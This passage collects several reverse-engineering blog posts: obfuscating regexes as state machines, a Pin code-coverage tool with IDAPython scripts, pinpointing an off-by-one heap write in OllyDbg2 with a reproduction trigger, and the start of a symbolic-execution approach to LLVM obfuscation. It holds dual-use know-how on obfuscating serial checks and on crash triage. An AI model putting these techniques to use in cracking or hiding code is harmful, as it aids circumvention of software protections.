    printf("%f\n", better_ref_clamp(-2.f, 1.f, -1.f)); // this prints -1.000
}

Even though we know this is undefined behavior in C++, LLVM doesn’t have enough information to know that. Adjusting code generation accordingly would be no easy task either. Despite all of this though, it does show how versatile LLVM truly is; relatively simple changes can have significant results.

Regular expressions obfuscation under the microscope

Introduction

Some months ago I came across a strange couple of functions that was kind of playing with a finite-state automaton to validate an input. At first glance, I didn't really notice it was in fact a regex being processed, that's exactly why I spent quite some time to understand those routines. You are right to ask yourself: "Hmm but the regex string representation should be in the binary shouldn't it?", the thing is it wasn't. The purpose of this post is to focus on those kind of "compiled" regex, like when the author transform somehow the regex in a FSM directly usable in its program (for the sake of efficiency I guess). And to extract that handy string representation, you have to study the automaton.

In this short post, we are going to see how a regular expression looks like in assembly/C, and how you can hide/obfuscate it. I hope you will enjoy the read, and you will both be able to recognize a regular expression compiled in your future reverse-engineering tasks and to obfuscate heavily your regex!

Bring out the FSM

Manually

Before automating things, let's see how we can implement a simple regex in C. It's always easier to reverse-engineer something you have, at least once in your life, implemented. Even if the actual implementation is slightly different from the one you did. Let's say we want to have an automaton that matches "Hi-[0-9]{4}".

NOTE: I just had the chance to have a conversation with Michal, and he is totally right saying that automata ins't really the regex we said it was. Here is an example of what the regex should match: 'Hi-GARBAGEGARBAGE_Hi-1234'. We don't allow our regex to like rewind the state to zero if the input doesn't match the regex. To do so, we could replace the return statements by a "state = 0" statement :). Thank you to Michal for the remark.

Now, if from that string representation we extract an FSM, we can have that one:

FSM_example.png
Here is this automaton implemented in C:
#include <stdio.h>
#include <string.h>

unsigned char checkinput(char* s)
{
    unsigned int state = 0, i = 0;
    do
    {
        switch(state)
        {
            case 0:
            {
                if(*s == 'H')
                    state = 1;

                break;
            }

            case 1:
            {
                if(*s == 'i')
                    state = 2;
                else
                    return 0;

                break;
            }

            case 2:
            {
                if(*s == '-')
                    state = 3;
                else
                    return 0;

                break;
            }

            case 3 ... 6:
            {
                if(*s >= '0' && *s <= '9')
                    state++;
                else
                    return 0;

                break;
            }

            case 7:
                return 1;
        }
    } while(*s++);

    return 0;
}

int main(int argc, char *argv[])
{
    if(argc != 2)
    {
        printf("./fsm <string>\n");
        return 0;
    }

    if(checkinput(argv[1]))
        printf("Good boy.\n");
    else
        printf("Bad boy.\n");

    return 1;
}

If we try to execute the program:

> fsm_example.exe garbage-Hi-1337-garbage
Good boy.

> fsm_example.exe garbage-Hi-1337
Good boy.

> fsm_example.exe Hi-1337-garbage
Good boy.

> fsm_example.exe Hi-dudies
Bad boy.

The purpose of that trivial example was just to show you how a regex string representation can be compiled into something harder to analyze but also more efficient (it doesn't need a compilation step, that's the reason why you may encounter that kind of thing in real (?) softwares). Even if the code seems trivial at the first sight, when you look at it at the assembly level, it takes a bit of time to figure out it's a simple "Hi-[0-9]{4}" regex.

cfg.png
In that kind of analysis, it's really important to find the "state" variable that allows the program to pass through the different nodes of the FSM. Then, you have also to figure out how you can reach a specific node, and all the nodes reachable from a specific one. To make it short, at the end of your analysis you really want to have a clean FSM like the one we did earlier. And once you have it, you want to eliminate unreachable nodes, and to minimize it in order to remove some potential automaton obfuscation.

Automatically

But what if our regex was totally more complex ? It would be a hell to implement manually the FSM. That's why I wanted to find some ways to generate your own FSM from a regex string manipulation.

With re2c

re2c is a cool and simple tool that allows you to describe your regex in a C comment, then it will generate the code of the scanner. As an example, here is the source code to generate the scanner for the previous regex:

{% include_code regular_expressions_obfuscation_under_the_microscope/fsm_re2c_example.c %}

Once you feed that source to re2c, it gives you that scanner ready to be compiled:

{% include_code regular_expressions_obfuscation_under_the_microscope/fsm_re2c_generated_non_optimized.c %}

Cool isn't it ? But in fact, if you try to compile and Hexrays it (even with optimizations disabled) you will be completely disappointed: it gets simplified like really ; not cool for us (cool for the reverse-engineer though!).

hexrays.png

By hand

That's why I tried to generate myself the C code of the scanner. The first thing you need is a "regular-expression string" to FSM Python library: a sort-of regex compiler. Then, once you are able to generate a FSM from a regular expression string, you are totally free to do whatever you want with the automaton. You can obfuscate it, try to optimize it, etc. You are also free to generate the C code you want. Here is the ugly-buggy-PoC code I wrote to generate the scanner for the regex used previously:

{% include_code regular_expressions_obfuscation_under_the_microscope/generate_c_fsm.py %}

Now, if you open it in IDA the CFG will look like this:

hell_yeah.png
Not that fun to reverse-engineer I guess. If you are enough curious to look at the complete source, here it is: fsm_generated_by_hand_example.c.

Thoughts to be more evil: one input to bind all the regex in the darkness

Keep in mind, the previous examples are really trivial to analyze, even if we had to do it at the assembly level without Hexrays (by the way Hexrays does a really nice job to simplify the assembly code, cool for us!). Even if we have slightly obfuscated the automaton with useless states/transitions, we may want to make things harder.

One interesting idea to bother the reverse-engineer is to use several regex as "input filters". You create one first "permissive" regex that has many possible valid inputs. To reduce the valid inputs set you use another regex as a filter. And you do that until you have only one valid input: your serial. Note that you may also want to build complex regex, because you are evil.

In that case, the reverse-engineer has to analyze all the different regex. And if you focus on a specific regex, you will have too many valid inputs whereas only one gives you the good boy (the intersection of all the valid inputs set of the different regex).

If you are interested by the subject, a cool resource I've seen recently that does similar things was in a CTF task write-up written by Michal Kowalczyk: read it, it's awesome.

UPDATE: You should also read the follow-up made by @fdfalcon "A black-box approach against obfuscated regular expressions using Pin". Using Pin to defeat the FSM obfuscation, and to prove my obfuscation was a bit buggy: two birds, one stone :)).

Messing with automata is good for you.

Some thoughts about code-coverage measurement with Pin

Introduction

Sometimes, when you are reverse-engineering binaries you need somehow to measure, or just to have an idea about how much "that" execution is covering the code of your target. It can be for fuzzing purpose, maybe you have a huge set of inputs (it can be files, network traffic, anything) and you want to have the same coverage with only a subset of them. Or maybe, you are not really interested in the measure, but only with the coverage differences between two executions of your target: to locate where your program is handling a specific feature for example.

But it's not a trivial problem, usually you don't have the source-code of the target, and you want it to be quick. The other thing, is that you don't have an input that covers the whole code base, you don't even know if it's possible ; so you can't compare your analysis to that "ideal one". Long story short, you can't say to the user "OK, this input covers 10% of your binary". But you can clearly register what your program is doing with input A, what it is doing with input B and then analyzing the differences. With that way you can have a (more precise?) idea about which input seems to have better coverage than another.

Note also, this is a perfect occasion to play with Pin :-)).

In this post, I will explain briefly how you can build that kind of tool using Pin, and how it can be used for reverse-engineer purposes.

Our Pintool

If you have never heard about Intel's DBI framework Pin, I have made a selection of links for you, read them and understand them ; you won't be able of using correctly Pin, if you don't know a bit how it works:

Concerning my setup, I'm using Pin 2.12 on Windows 7 x64 with VC2010 and I'm building x86 Pintools (works great with Wow64). If you want to build easily your Pintool outside of the Pin tool kit directory I've made a handy little python script: setup_pintool_project.py.

Before coding, we need to talk a bit about what we really want. This is simple, we want a Pintool that:

  • is the more efficient possible. OK, that's a real problem ; even if Pin is more efficient than other DBI framework (like DynamoRio or Valgrind), it is always kind of slow.
  • keeps track of all the basic blocks executed. We will store the address of each basic block executed and its number of instructions.
  • generates a JSON report about a specific execution. Once we have that report, we are free to use Python scripts to do whatever we want. To do that, we will use Jansson: it's easy to use, open-source and written in C.
  • doesn't instrument Windows APIs. We don't want to waste our CPU time being in the native libraries of the system ; it's part of our little "tricks" to improve the speed of our Pintool.

I think it's time to code now: first, let's define several data structures in order to store the information we need:

typedef std::map<std::string, std::pair<ADDRINT, ADDRINT> > MODULE_BLACKLIST_T;
typedef MODULE_BLACKLIST_T MODULE_LIST_T;
typedef std::map<ADDRINT, UINT32> BASIC_BLOCKS_INFO_T;

The two first types will be used to hold modules related information: path of the module, start address and end address. The third one is simple: the key is the basic block address and the value is its number of instructions.

Then we are going to define our instrumentation callback:

  • one to know whenever a module is loaded in order to store its base/end address, one for the traces. You can set the callbacks using IMG_AddInstrumentationFunction and TRACE_AddInstrumentationFunction.
VOID image_instrumentation(IMG img, VOID * v)
{
    ADDRINT module_low_limit = IMG_LowAddress(img), module_high_limit = IMG_HighAddress(img); 

    if(IMG_IsMainExecutable(img))
        return;

    const std::string image_path = IMG_Name(img);

    std::pair<std::string, std::pair<ADDRINT, ADDRINT> > module_info = std::make_pair(
        image_path,
        std::make_pair(
            module_low_limit,
            module_high_limit
        )
    );

    module_list.insert(module_info);
    module_counter++;

    if(is_module_should_be_blacklisted(image_path))
        modules_blacklisted.insert(module_info);
}
  • one to be able to insert calls before every basic blocks.

The thing is: Pin doesn't have a BBL_AddInstrumentationFunction, so we have to instrument the traces, iterate through them to get the basic block. It's done really easily with TRACE_BblHead, BBL_Valid and BBL_Next functions. Of course, if the basic block address is in a blacklisted range address, we don't insert a call to our analysis function.

VOID trace_instrumentation(TRACE trace, VOID *v)
{
    for(BBL bbl = TRACE_BblHead(trace); BBL_Valid(bbl); bbl = BBL_Next(bbl))
    {
        if(is_address_in_blacklisted_modules(BBL_Address(bbl)))
            continue;

        BBL_InsertCall(
            bbl,
            IPOINT_ANYWHERE,
            (AFUNPTR)handle_basic_block,
            IARG_FAST_ANALYSIS_CALL,

            IARG_UINT32,
            BBL_NumIns(bbl),

            IARG_ADDRINT,
            BBL_Address(bbl),

            IARG_END
        );
    }
}

For efficiency reasons, we let decide Pin about where it puts its JITed call to the analysis function handle_basic_block ; we also use the fast linkage (it basically means the function will be called using the __fastcall calling convention).

The analysis function is also very trivial, we just need to store basic block addresses in a global variable. The method doesn't have any branch, it means Pin will most likely inlining the function, that's also cool for the efficiency.

VOID PIN_FAST_ANALYSIS_CALL handle_basic_block(UINT32 number_instruction_in_bb, ADDRINT address_bb)
{
    basic_blocks_info[address_bb] = number_instruction_in_bb;
}

Finally, just before the process ends we serialize our data in a simple JSON report thanks to jansson. You may also want to use a binary serialization to have smaller report.

VOID save_instrumentation_infos()
{
    /// basic_blocks_info section
    json_t *bbls_info = json_object();
    json_t *bbls_list = json_array();
    json_t *bbl_info = json_object();
    // unique_count field
    json_object_set_new(bbls_info, "unique_count", json_integer(basic_blocks_info.size()));
    // list field
    json_object_set_new(bbls_info, "list", bbls_list);
    for(BASIC_BLOCKS_INFO_T::const_iterator it = basic_blocks_info.begin(); it != basic_blocks_info.end(); ++it)
    {
        bbl_info = json_object();
        json_object_set_new(bbl_info, "address", json_integer(it->first));
        json_object_set_new(bbl_info, "nbins", json_integer(it->second));
        json_array_append_new(bbls_list, bbl_info);
    }

    /* .. same thing for blacklisted modules, and modules .. */
    /// Building the tree
    json_t *root = json_object();
    json_object_set_new(root, "basic_blocks_info", bbls_info);
    json_object_set_new(root, "blacklisted_modules", blacklisted_modules);
    json_object_set_new(root, "modules", modules);

    /// Writing the report
    FILE* f = fopen(KnobOutputPath.Value().c_str(), "w");
    json_dumpf(root, f, JSON_COMPACT | JSON_ENSURE_ASCII);
    fclose(f);
}

If like me you are on a x64 Windows system, but you are instrumenting x86 processes you should directly blacklist the area where Windows keeps the SystemCallStub (you know the "JMP FAR"). To do that, we simply use the __readfsdword intrinsic in order to read the field TEB32.WOW32Reserved that holds the address of that stub. Like that you won't waste your CPU time every time your program is performing a system call.

ADDRINT wow64stub = __readfsdword(0xC0);
modules_blacklisted.insert(
    std::make_pair(
        std::string("wow64stub"),
        std::make_pair(
            wow64stub,
            wow64stub
        )
    )
);

The entire Pintool source code is here: pin-code-coverage-measure.cpp.

I want to see the results.

I agree that's neat to have a JSON report with the basic blocks executed by our program, but it's not really readable for a human. We can use an IDAPython script that will parse our report, and will color all the instructions executed. It should be considerably better to see the execution path used by your program.

To color an instruction you have to use the functions: idaapi.set_item_color and idaapi.del_item_color (if you want to reset the color). You can also use idc.GetItemSize to know the size of an instruction, like that you can iterate for a specific number of instruction (remember, we stored that in our JSON report!).

# idapy_color_path_from_json.py
import json
import idc
import idaapi

def color(ea, nbins, c):
    '''Color 'nbins' instructions starting from ea'''
    colors = defaultdict(int, {
            'black' : 0x000000,
            'red' : 0x0000FF,
            'blue' : 0xFF0000,
            'green' : 0x00FF00
        }
    )
    for _ in range(nbins):
        idaapi.del_item_color(ea)
        idaapi.set_item_color(ea, colors[c])
        ea += idc.ItemSize(ea)

def main():
    f = open(idc.AskFile(0, '*.json', 'Where is the JSON report you want to load ?'), 'r')
    c = idc.AskStr('black', 'Which color do you want ?').lower()
    report = json.load(f)
    for i in report['basic_blocks_info']['list']:
        print '%x' % i['address'],
        try:
            color(i['address'], i['nbins'], c)
            print 'ok'
        except Exception, e:
            print 'fail: %s' % str(e)
    print 'done'    
    return 1

if __name__ == '__main__':
    main()

Here is an example generated by launching "ping google.fr", we can clearly see in black the nodes reached by the ping utility:

ping.png
You can even start to generate several traces with different options, to see where each argument is handled and analyzed by the program :-).

Trace differences

As you saw previously, it can be handy to actually see the execution path our program took. But if you think about it, it can be even more handy to have a look at the differences between two different executions. It could be used to locate a specific feature of a program: like a license check, where an option is checked, etc.

Now, let's run another trace with for example "ping -n 10 google.fr". Here are the two executions traces and the difference between the two others (the previous one, and the new):

pingboth.png
You can clearly identify the basic blocks and the functions that use the "-n 10" argument. If you look even closer, you are able very quickly to figure out where the string is converted into an integer:

strtoul.png
A lot of software are built around a really annoying GUI (for the reverser at least): it usually generates big binaries, or ships with a lot of external modules (like Qt runtime libraries). The thing is you don't really care about how the GUI is working, you want to focus on the "real" code not on that "noise". Each time you have noise somewhere, you have to figure out a way to filter that noise ; in order to only keep the interesting part. This is exactly what we are doing when we generate different execution traces of the program and the process is every time pretty the same:
  • You launch the application, and you exit
  • You launch the application, you do something and you exit
  • You remove the basic blocks executed in the first run in the second trace ; in order to keep only the part that does the "do something" thing. That way you filter the noise induced by the GUI to focus only on the interesting part.

Cool for us because that's pretty easy to implement via IDAPython, here is the script:

# idapy_color_diff_from_jsons.py https://github.com/0vercl0k/stuffz/blob/master/pin-code-coverage-measure/idapy_color_diff_from_jsons.py
import json
import idc
import idaapi
from collections import defaultdict

def color(ea, nbins, c):
    '''Color 'nbins' instructions starting from ea'''
    colors = defaultdict(int, {
            'black' : 0x000000,
            'red' : 0x0000FF,
            'blue' : 0xFF0000,
            'green' : 0x00FF00
        }
    )
    for _ in range(nbins):
        idaapi.del_item_color(ea)
        idaapi.set_item_color(ea, colors[c])
        ea += idc.ItemSize(ea)

def main():
    f = open(idc.AskFile(0, '*.json', 'Where is the first JSON report you want to load ?'), 'r')
    report = json.load(f)
    l1 = report['basic_blocks_info']['list']

    f = open(idc.AskFile(0, '*.json', 'Where is the second JSON report you want to load ?'), 'r')
    report = json.load(f)
    l2 = report['basic_blocks_info']['list']
    c = idc.AskStr('black', 'Which color do you want ?').lower()

    addresses_l1 = set(r['address'] for r in l1)    
    addresses_l2 = set(r['address'] for r in l2)
    dic_l2 = dict((k['address'], k['nbins']) for k in l2)

    diff = addresses_l2 - addresses_l1
    print '%d bbls in the first execution' % len(addresses_l1)
    print '%d bbls in the second execution' % len(addresses_l2)
    print 'Differences between the two executions: %d bbls' % len(diff)

    assert(len(addresses_l1) < len(addresses_l2))

    funcs = defaultdict(list)
    for i in diff:
        try:
            color(i, dic_l2[i], c)
            funcs[get_func(i).startEA].append(i)
        except Exception, e:
            print 'fail %s' % str(e)

    print 'A total of %d different sub:' % len(funcs)
    for s in funcs.keys():
        print '%x' % s

    print 'done'    
    return 1

if __name__ == '__main__':
    main()

By the way, you must keep in mind we are only talking about deterministic program (will always execute the same path if you give it the same inputs). If the same inputs aren't giving the exact same outputs every time, your program is not deterministic.

Also, don't forget about ASLR because if you want to compare basic block addresses executed at two different times, trust me you want your binary loaded at the same base address. However, if you want to patch quickly a simple file I've made a little Python script that can be handy sometimes: remove_aslr_bin.py ; otherwise, booting your Windows XP virtual machine is the easy solution.

Does-it scale ?

These tests have been done on my Windows 7 x64 laptop with Wow64 processes (4GB RAM, i7 Q720 @ 1.6GHz). All the modules living in C:\Windows have been blacklisted. Also, note those tests are not really accurate, I didn't launch each thing thousand times, it's just here to give you a vague idea.

Portable Python 2.7.5.1

Without instrumentation

PS D:\> Measure-Command {start-process python.exe "-c 'quit()'" -Wait}

TotalMilliseconds : 73,1953

With instrumentation and JSON report serialization

PS D:\> Measure-Command {start-process pin.exe "-t pin-code-coverage-measure.dll -o test.json -- python.exe -c 'quit()'" -Wait} 

TotalMilliseconds : 13122,4683

VLC 2.0.8

Without instrumentation

PS D:\> Measure-Command {start-process vlc.exe "--play-and-exit hu" -Wait}

TotalMilliseconds : 369,4677

With instrumentation and JSON report serialization

PS D:\> Measure-Command {start-process pin.exe "-t pin-code-coverage-measure.dll -o test.json -- D:\vlc.exe --play-and-exit hu" -Wait}

TotalMilliseconds : 60109,204

To optimize the process you may want to blacklist some of the VLC plugins (there are a tons!), otherwise your VLC instrumented is 160 times slower than the normal one (and I didn't even try to launch the instrumentation when decoding x264 videos).

Browsers ?

You don't want to see the overhead here.

Conclusion

If you want to use that kind of tool for fuzzing purposes, I definitely encourage you to make a little program that uses the library you are targeting the same way your target does. This way you have a really smaller and less complicate binary to instrument, thus the instrumentation process will be far more efficient. And in this specific case, I really believe you can launch this Pintool on a large set of inputs (thousands) in order to pick inputs that cover better your target. In the other hand, if you do that directly on big software like browsers: it won't scale because you will pass your time instrumenting GUI or stuff you don't care.

Pin is a really powerful and accessible tool. The C++ API is really easy to use, it works with Linux, OSX, Android for x86, (even X86_64 on the important targets), there is also a doxygen documentation. What else seriously ?

Use it, it's good for you.

References & sources of inspiration

If you find that subject cool, I've made a list of cool readings:

Pinpointing heap-related issues: OllyDbg2 off-by-one story

Introduction

Yesterday afternoon, I was peacefully coding some stuff you know but I couldn't make my code working. As usual, in those type of situations you fire up your debugger in order to understand what is going on under the hood. That was a bit weird, to give you a bit of context I was doing some inline x86 assembly, and I've put on purpose an int3 just before the piece of assembly code I thought was buggy. Once my file loaded in OllyDbg2, I hit F9 in order to reach quickly the int3 I've slipped into the inline assembly code. A bit of single-stepping, and BOOM I got a nasty crash. It happens sometimes, and that's uncool. Then, I relaunch my binary and try to reproduce the bug: same actions and BOOM again. OK, this time it's cool, I got a reproducible crash in OllyDbg2.

I like when things like that happens to me (remember the crashes I've found in OllyDbg/IDA here: PDB Ain't PDD), it's always a nice exercise for me where I've to:

  • pinpoint the bug in the application: usually not trivial when it's a real/big application
  • reverse-engineer the codes involved in the bug in order to figure out why it's happening (sometimes I got the sources, sometimes I don't like this time)

In this post, I will show you how I've manage to pinpoint where the bug was, using GFlags, PageHeap and WinDbg. Then, we will reverse-engineer the buggy code in order to understand why the bug is happening, and how we can code a clean trigger.

The crash

The first thing I did was to launch WinDbg to debug OllyDbg2 to debug my binary (yeah.). Once OllyDbg2 has been started up, I reproduced exactly the same steps as previously to trigger the bug and here is what WinDbg was telling me:

HEAP[ollydbg.exe]: Heap block at 00987AB0 modified at 00987D88 past
requested size of 2d0

(a60.12ac): Break instruction exception - code 80000003 (first chance)
eax=00987ab0 ebx=00987d88 ecx=76f30b42 edx=001898a5 esi=00987ab0 edi=000002d0
eip=76f90574 esp=00189aec ebp=00189aec iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200202
ntdll!RtlpBreakPointHeap+0x23:
76f90574 cc              int     3

We got a debug message from the heap allocator informing us the process has written outside of its heap buffer. The thing is, this message and the breakpoint are not triggered when the faulty write is done but triggered like after, when another call to the allocator has been made. At this moment, the allocator is checking the chunks are OK and if it sees something weird, it outputs a message and breaks. The stack-trace should confirm that:

0:000> k
ChildEBP RetAddr  
00189aec 76f757c2 ntdll!RtlpBreakPointHeap+0x23
00189b04 76f52a8a ntdll!RtlpCheckBusyBlockTail+0x171
00189b24 76f915cf ntdll!RtlpValidateHeapEntry+0x116
00189b6c 76f4ac29 ntdll!RtlDebugFreeHeap+0x9a
00189c60 76ef34a2 ntdll!RtlpFreeHeap+0x5d
00189c80 75d8537d ntdll!RtlFreeHeap+0x142
00189cc8 00403cfc KERNELBASE!GlobalFree+0x27
00189cd4 004cefc0 ollydbg!Memfree+0x3c
...

As we said just above, the message from the heap allocator has been probably triggered when OllyDbg2 wanted to free a chunk of memory.

Basically, the problem with our issue is the fact we don't know:

  • where the heap chunk has been allocated
  • where the faulty write has been made

That's what makes our bug not trivial to debug without the suitable tools. If you want to have more information about debugging heap issues efficiently, you should definitely read the heap chapter in Advanced Windows Debugging (cheers `Ivan).

Pinpointing the heap issue: introducing full PageHeap

In a nutshell, the full PageHeap option is really powerful to diagnostic heap issues, here are at least two reasons why:

  • it will save where each heap chunk has been allocated
  • it will allocate a guard page at the end of our chunk (thus when the faulty write occurs, we might have a write access exception)

To do so, this option changes a bit how the allocator works (it adds more meta-data for each heap chunk, etc.) ; if you want more information, try at home allocating stuff with/without page heap and compare the allocated memory. Here is how looks like a heap chunk when PageHeap full is enabled:

heapchunk.gif
To enable it for ollydbg.exe, it's trivial. We just launch the gflags.exe binary (it's in Windbg's directory) and you tick the features you want to enable.

gflags.png
Now, you just have to relaunch your target in WinDbg, reproduce the bug and here is what I get now:
(f48.1140): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.

eax=000000b4 ebx=0f919abc ecx=0f00ed30 edx=00000b73 esi=00188694 edi=005d203c
eip=004ce769 esp=00187d60 ebp=00187d80 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
ollydbg!Findfreehardbreakslot+0x21d9:
004ce769 891481          mov     dword ptr [ecx+eax*4],edx ds:002b:0f00f000=????????

Woot, this is very cool, because now we know exactly where something is going wrong. Let's get more information about the heap chunk now:

0:000> !heap -p -a ecx
    address 0f00ed30 found in
    _DPH_HEAP_ROOT @ 4f11000
    in busy allocation
    (  DPH_HEAP_BLOCK:  UserAddr  UserSize -  VirtAddr VirtSize)
              f6f1b2c:  f00ed30        2d0 -  f00e000  2000

    6e858e89 verifier!AVrfDebugPageHeapAllocate+0x00000229
    76f90d96 ntdll!RtlDebugAllocateHeap+0x00000030
    76f4af0d ntdll!RtlpAllocateHeap+0x000000c4
    76ef3cfe ntdll!RtlAllocateHeap+0x0000023a
    75d84e55 KERNELBASE!GlobalAlloc+0x0000006e
    00403bef ollydbg!Memalloc+0x00000033
    004ce5ec ollydbg!Findfreehardbreakslot+0x0000205c
    004cf1df ollydbg!Getsourceline+0x0000007f
    00479e1b ollydbg!Getactivetab+0x0000241b
    0047b341 ollydbg!Setcpu+0x000006e1
    004570f4 ollydbg!Checkfordebugevent+0x00003f38
    0040fc51 ollydbg!Setstatus+0x00006441
    004ef9ef ollydbg!Pluginshowoptions+0x0001214f

With this really handy command we got a lot of relevant information:

  • This chunk has a size of 0x2d0 bytes. Thus, starting from 0xf00ed30 to 0xf00efff.
  • The faulty write now makes sense: the application tries to write 4 bytes outside of its heap buffer (off-by-one on an unsigned array I guess).
  • The memory has been allocated in ollydbg!Memalloc (called by ollydbg!Getsourceline, PDB related ?). We will study that routine later in the post.
  • The faulty write occurs at address 0x4ce769.

Looking inside OllyDbg2

We are kind of lucky, the routines involved with this bug are quite simple to reverse-engineer, and Hexrays works just like a charm. Here is the C code (the interesting part at least) of the buggy function:

//ollydbg!buggy @ 0x004CE424
signed int buggy(struct_a1 *u)
{
  int file_size;
  unsigned int nbchar;
  unsigned __int8 *file_content;
  int nb_lines;
  int idx;

  // ...
  file_content = (unsigned __int8 *)Readfile(&u->sourcefile, 0, &file_size);
  // ...
  nbchar = 0;
  nb_lines = 0;
  while(nbchar < file_size)
  {
    // doing stuff to count all the char, and all the lines in the file
    // ...
  }

  u->mem1_ov = (unsigned int *)Memalloc(12 * (nb_lines + 1), 3);
  u->mem2 = Memalloc(8 * (nb_lines + 1), 3);
  if ( u->mem1_ov && u->mem2 )
  {
    nbchar = 0;
    nb_lines2 = 0;
    while ( nbchar < file_size && file_content[nbchar] )
    {
      u->mem1_ov[3 * nb_lines2] = nbchar;
      u->mem1_ov[3 * nb_lines2 + 1] = -1;
      if ( nbchar < file_size )
      {
        while ( file_content[nbchar] )
        {
            // Consume a line, increment stuff until finding a '\r' or '\n' sequence
            // ..
        }
      }
      ++nb_lines2;
    }
    // BOOM!
    u->mem1_ov[3 * nb_lines2] = nbchar;
    // ...
  }
}

So, let me explain what this routine does:

  • This routine is called by OllyDbg2 when it finds a PDB database for your binary and, more precisely, when in this database it finds the path of your application's source codes. It's useful to have those kind of information when you are debugging, OllyDbg2 is able to tell you at which line of your C code you're currently at.

source.png
* At line 10: "u->Sourcefile" is a string pointer on the path of your source code (found in the PDB database). The routine is just reading the whole file, giving you its size, and a pointer on the file content now stored memory. * From line 12 to 18: we have a loop counting the total number of lines in your source code. * At line 20: we have the allocation of our chunk. It allocates 12*(nb_lines + 1) bytes. We saw previously in WinDbg that the size of the chunk was 0x2d0: it should means we have exactly ((0x2d0 / 12) - 1) = 59 lines in our source code:
D:\TODO\crashes\odb2-OOB-write-heap>wc -l OOB-write-heap-OllyDbg2h-trigger.c
59 OOB-write-heap-OllyDbg2h-trigger.c

Good.

  • From line 24 to 39: we have a loop similar to previous one. It's basically counting lines again and initializing the memory we just allocated with some information.
  • At line 41: we have our bug. Somehow, we can manage to get out of the loop with "nb_lines2 = nb_lines + 1". That means the line 41 will try to write one cell outside of our buffer. In our case, if we have "nb_lines2 = 60" and our heap buffer starting at 0xf00ed30, it means we're going to try to write at (0xf00ed30+6034)=0xf00f000. That's exactly what we saw earlier.

At this point, we have fully explained the bug. If you want to do some dynamic analysis in order to follow important routines, I've made several breakpoints, here they are:

bp 004CF1BF ".printf \"[Getsourceline] %mu\\n[Getsourceline] struct: 0x%x\", poi(esp + 4), eax ; .if(eax != 0){ .if(poi(eax + 0x218) == 0){ .printf \" field: 0x%x\\n\", poi(eax + 0x218); gc }; } .else { .printf \"\\n\\n\" ; gc; };"
bp 004CE5DD ".printf \"[buggy] Nbline: 0x%x \\n\", eax ; gc"
bp 004CE5E7 ".printf \"[buggy] Nbbytes to alloc: 0x%x \\n\", poi(esp) ; gc"
bp 004CE742 ".printf \"[buggy] NbChar: 0x%x / 0x%x - Idx: 0x%x\\n\", eax, poi(ebp - 1C), poi(ebp - 8) ; gc"
bp 004CE769 ".printf \"[buggy] mov [0x%x + 0x%x], 0x%x\\n\", ecx, eax * 4, edx"

On my environment, it gives me something like:

[Getsourceline] f:\dd\vctools\crt_bld\self_x86\crt\src\crt0.c
[Getsourceline] struct: 0x0
[...]
[Getsourceline] oob-write-heap-ollydbg2h-trigger.c
[Getsourceline] struct: 0xaf00238 field: 0x0
[buggy] Nbline: 0x3b 
[buggy] Nbbytes to alloc: 0x2d0 
[buggy] NbChar: 0x0 / 0xb73 - Idx: 0x0
[buggy] NbChar: 0x4 / 0xb73 - Idx: 0x1
[buggy] NbChar: 0x5a / 0xb73 - Idx: 0x2
[buggy] NbChar: 0xa4 / 0xb73 - Idx: 0x3
[buggy] NbChar: 0xee / 0xb73 - Idx: 0x4
[...]
[buggy] NbChar: 0xb73 / 0xb73 - Idx: 0x3c
[buggy] mov [0xb031d30 + 0x2d0], 0xb73

eax=000000b4 ebx=12dfed04 ecx=0b031d30 edx=00000b73 esi=00188694 edi=005d203c
eip=004ce769 esp=00187d60 ebp=00187d80 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200246
ollydbg!Findfreehardbreakslot+0x21d9:
004ce769 891481          mov     dword ptr [ecx+eax*4],edx ds:002b:0b032000=????????

Repro@home

  1. Download the last version of OllyDbg2 here, extract the files
  2. Download the three files from odb2-oob-write-heap, put them in the same directory than ollydbg.exe is
  3. Launch WinDbg and open the last version of OllyDbg2
  4. Set your breakpoints (or not), F5 to launch
  5. Open the trigger in OllyDbg2
  6. Press F9 when the binary is fully loaded
  7. BOOM :). Note that you may not have a visible crash (remember, that's what made our bug not trivial to debug without full pageheap). Try to poke around with the debugger: restarting the binary or closing OllyDbg2 should be enough to get the message from the heap allocator in your debugger.

woot.png

Fun fact

You can even trigger the bug with only the binary and the PDB database. The trick is to tamper the PDB, and more precisely where it keeps the path to your source code. That way, when OllyDbg2 will load the PDB database, it will read that same database like it's the source code of the application. Awesome.

fun.png

Conclusion

Those kind of crashes are always an occasion to learn new things. Either it's trivial to debug/repro and you won't waste much of your time, or it's not and you will improve your debugger/reverse-engineer-fu on a real example. So do it!

By the way, I doubt the bug is exploitable and I didn't even try to exploit it ; but if you succeed I would be really glad to read your write-up! But if we assume it's exploitable for a second, you would still have to distribute the PDB file, the source file (I guess it would give you more control than with the PDB) and the binary to your victim. So no big deal.

If you are too lazy to debug your crashes, send them to me, I may have a look at it!

Oh, I almost forgot: we are still looking for motivated contributors to write cool posts, spread the world.

Breaking Kryptonite's obfuscation: a static analysis approach relying on symbolic execution

Introduction

Kryptonite was a proof-of-concept I built to obfuscate codes at the LLVM intermediate representation level. The idea was to use semantic-preserving transformations in order to not break the original program. One of the main idea was for example to build a home-made 32 bits adder to replace the add LLVM instruction. Instead of having a single asm instruction generated at the end of the pipeline, you will end up with a ton of assembly codes doing only an addition. If you never read my article, and you are interested in it here it is: Obfuscation of steel: meet my Kryptonite.

home-made-adder.png

In this post I wanted to show you how we can manage to break that obfuscation with symbolic execution. We are going to write a really tiny symbolic execution engine with IDAPy, and we will use Z3Py to simplify all our equations. Note that a friend of mine @elvanderb used a similar approach (more generic though) to simplify some parts of the crackme ; but he didn't wanted to publish it, so here is my blog post about it!

The target

In this blogpost we are first going to work on the LLVM code emitted by llvm-cpp-frontend-home-made-32bits-adder.cpp. Long story short, the code uses the LLVM frontend API to emit a home made 32 bits adder in the LLVM intermediate language. You can then feed the output directly to clang to generate a real executable binary for your platform, I chose to work only on the x86 platform here. I've also uploaded the binary here: adder.

So if you open the generated binary in IDA, you will see an interminable routine that only does an addition. At first glance, it really is kind of scary:

  • every instructions seems to be important, there is no junk codes
  • it seems that only binary operations are used: addition, left shift, right shift, xor, etc.
  • it's also a two thousands instructions routine

